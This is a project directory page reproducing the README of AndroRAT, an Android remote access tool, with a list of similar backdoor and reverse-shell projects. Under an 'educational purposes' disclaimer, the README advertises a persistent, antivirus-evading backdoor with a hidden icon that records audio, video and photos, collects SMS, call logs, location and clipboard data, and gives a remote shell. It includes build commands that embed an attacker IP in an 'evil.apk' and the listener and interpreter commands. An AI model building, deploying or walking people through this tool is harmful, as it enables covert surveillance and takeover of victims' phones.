All Projects → karma9874 → Androrat

karma9874 / Androrat

Licence: mit
A Simple android remote administration tool using sockets. It uses java on the client side and python on the server side

Programming Languages

python
139335 projects - #7 most used programming language
java
68154 projects - #9 most used programming language

Projects that are alternatives of or similar to Androrat

YAPS
Yet Another PHP Shell - The most complete PHP reverse shell
Stars: ✭ 35 (-81.28%)
Mutual labels:  backdoor, reverse-shell, exploit, rat
Thoron
Thoron Framework is a Linux post-exploitation framework that exploits Linux TCP vulnerability to provide a shell-like connection. Thoron Framework has the ability to create simple payloads to provide Linux TCP attack.
Stars: ✭ 87 (-53.48%)
Mutual labels:  exploit, backdoor, rat, reverse-shell
Androrat
AndroRAT | Remote Administrator Tool for Android OS Hacking
Stars: ✭ 340 (+81.82%)
Mutual labels:  exploit, rat, android-application
Evilosx
An evil RAT (Remote Administration Tool) for macOS / OS X.
Stars: ✭ 1,826 (+876.47%)
Mutual labels:  backdoor, rat, reverse-shell
Ghost
Ghost Framework is an Android post-exploitation framework that exploits the Android Debug Bridge to remotely access an Android device.
Stars: ✭ 1,934 (+934.22%)
Mutual labels:  backdoor, exploit, rat
Pupy
Pupy is an opensource, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in python
Stars: ✭ 6,737 (+3502.67%)
Mutual labels:  backdoor, rat, reverse-shell
Ghost
Ghost Framework is an Android post-exploitation framework that exploits the Android Debug Bridge to remotely access an Android device. Ghost Framework gives you the power and convenience of remote Android device administration.
Stars: ✭ 992 (+430.48%)
Mutual labels:  exploit, backdoor, rat
Tinkerershell
A simple python reverse shell written just for fun.
Stars: ✭ 62 (-66.84%)
Mutual labels:  backdoor, rat, reverse-shell
Mass Rat
Basic Multiplatform Remote Administration Tool - Xamarin
Stars: ✭ 127 (-32.09%)
Mutual labels:  backdoor, rat
Whatsapp Bulk Sender
Send bulk messages right from your WhatsApp Android Client or WhatsApp Web
Stars: ✭ 135 (-27.81%)
Mutual labels:  hacktoberfest, android-application
Networm
Python network worm that spreads on the local network and gives the attacker control of these machines.
Stars: ✭ 135 (-27.81%)
Mutual labels:  backdoor, rat
Wulkanowy
🌋 Androidowy klient dziennika VULCAN UONET+ dla ucznia i rodzica
Stars: ✭ 107 (-42.78%)
Mutual labels:  hacktoberfest, android-application
Bonjourbrowser
Service Browser is a utility that discovers all services registered in a network
Stars: ✭ 104 (-44.39%)
Mutual labels:  hacktoberfest, android-application
Deautherdroid
Additional android app for SpaceHunn's ESP8266 DeAuther.
Stars: ✭ 93 (-50.27%)
Mutual labels:  hacktoberfest, android-application
Stitch
Python Remote Administration Tool (RAT)
Stars: ✭ 2,018 (+979.14%)
Mutual labels:  rat, reverse-shell
Jexboss
JexBoss: Jboss (and Java Deserialization Vulnerabilities) verify and EXploitation Tool
Stars: ✭ 2,008 (+973.8%)
Mutual labels:  exploit, reverse-shell
Reverse Shell
Reverse Shell as a Service
Stars: ✭ 1,281 (+585.03%)
Mutual labels:  exploit, reverse-shell
Proton
Proton Framework is a Windows post-exploitation framework similar to other Windows post-exploitation frameworks. The major difference is that the Proton Framework does most of its operations using Windows Script Host, with compatibility in the core to support a default installation of Windows 2000 with no service packs all the way through Windows 10.
Stars: ✭ 142 (-24.06%)
Mutual labels:  backdoor, rat
Adbsploit
A python based tool for exploiting and managing Android devices via ADB
Stars: ✭ 147 (-21.39%)
Mutual labels:  apk, exploit
Nf Interpreter
⚙️ nanoFramework Interpreter, CLR, HAL, PAL and reference target boards
Stars: ✭ 168 (-10.16%)
Mutual labels:  hacktoberfest, interpreter

Disclaimer : This software is meant for educational purposes only. I don't feel responsible for any malicious use of the app.

AndroRAT

MIT License Twitter Follow GitHub followers

AndroRAT is a tool designed to give the control of the android system remotely and retrieve informations from it. Androrat is a client/server application developed in Java Android for the client side and the Server is in Python.

AndroRAT will work on device from Android 4.1 (Jelly Bean) to Android 9.0 (Oreo) (API 16 to API 28)

AndroRAT also works on Android 10 (Q) but some of the interpreter command will be unstable.

Screenshots

AndroRAT

Features of AndroRAT

  • Full persistent backdoor
  • Fully undetectable by any antivirus scanner VirusTotal
  • Invisible icon on install
  • Light weight apk which runs 24*7 in background
  • App starts automatically on boot up
  • Can record audio, video, take picture from both camera
  • Browse call logs and SMS logs
  • Get current location, sim card details ,ip, mac address of the device

Prerequisites

AndroRAT requires Python (> 3.6) and JAVA 8 (or Android Studio)

Installation

git clone https://github.com/karma9874/AndroRAT.git
pip install -r requirements.txt

Note:

While cloning the repository using Git bash on windows, you may get the following error:

error: unable to create file <filename>: Filename too long

This is because the Git has a limit of 4096 characters for a filename, except on Windows when Git is compiled with msys. It uses an older version of the Windows API and there's a limit of 260 characters for a filename.

You can circumvent this by setting core.longpaths to true.

git config --system core.longpaths true

You must run Git bash with administrator privileges.

Usage (Windows and Linux)

Available Modes

  • --build - for building the android apk
  • --ngrok - for using ngrok tunnel (over the internet)
  • --shell - getting an interactive shell of the device

build mode

Usage:
  python androRAT.py --build --ngrok [flags]
  Flags:
    -p, --port              Attacker port number (optional by default its set to 8000)
    -o, --output            Name for the apk file (optional by default its set to "karma.apk")
Usage:
  python androRAT.py --build [flags]
  Flags:
    -i, --ip                Attacker IP address (required)
    -p, --port              Attacker port number (required)
    -o, --output            Name for the apk file (optional)

Or you can manually build the apk by importing Android Code folder to Android Studio and changing the IP address and port number in config.java file and then you can generate the signed apk from Android Studio -> Build -> Generate Signed APK(s)

shell mode

Usage:
  python androRAT.py --shell [flags]
  Flags:
    -i, --ip                Listner IP address
    -p, --port              Listner port number

After running the shell mode you will get an interpreter of the device

Commands which can run on the interpreter

    deviceInfo                 --> returns basic info of the device
    camList                    --> returns cameraID  
    takepic [cameraID]         --> Takes picture from camera
    startVideo [cameraID]      --> starts recording the video
    stopVideo                  --> stop recording the video and return the video file
    startAudio                 --> starts recording the audio
    stopAudio                  --> stop recording the audio
    getSMS [inbox|sent]        --> returns inbox sms or sent sms in a file 
    getCallLogs                --> returns call logs in a file
    shell                      --> starts a sh shell of the device
    vibrate [number_of_times]  --> vibrate the device number of time
    getLocation                --> return the current location of the device
    getIP                      --> returns the ip of the device
    getSimDetails              --> returns the details of all sim of the device
    clear                      --> clears the screen
    getClipData                --> return the current saved text from the clipboard
    getMACAddress              --> returns the mac address of the device
    exit                       --> exit the interpreter

In the sh shell there are some sub commands

    get [full_file_path]        --> donwloads the file to the local machine (file size upto 15mb)
    put [filename]              --> uploads the file to the android device

Examples

  • To build the apk using ngrok which will also set the listner: python androRAT.py --build --ngrok -o evil.apk

  • To build the apk using desired ip and port: python androRAT.py --build -i 192.169.x.x -p 8000 -o evil.apk

  • To get the interpreter: python androRAT.py --shell -i 0.0.0.0 -p 8000

Interpreter Examples

  • Generating APK

------------------------------------------------------------------------------------------------------------------------------
  • Some interpreter Commands

------------------------------------------------------------------------------------------------------------------------------

TODO

  • Ngrok support
  • Set up multi client
  • Add screenshot command

License

AndroRAT is licensed under MIT license take a look at the LICENSE for more information.

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].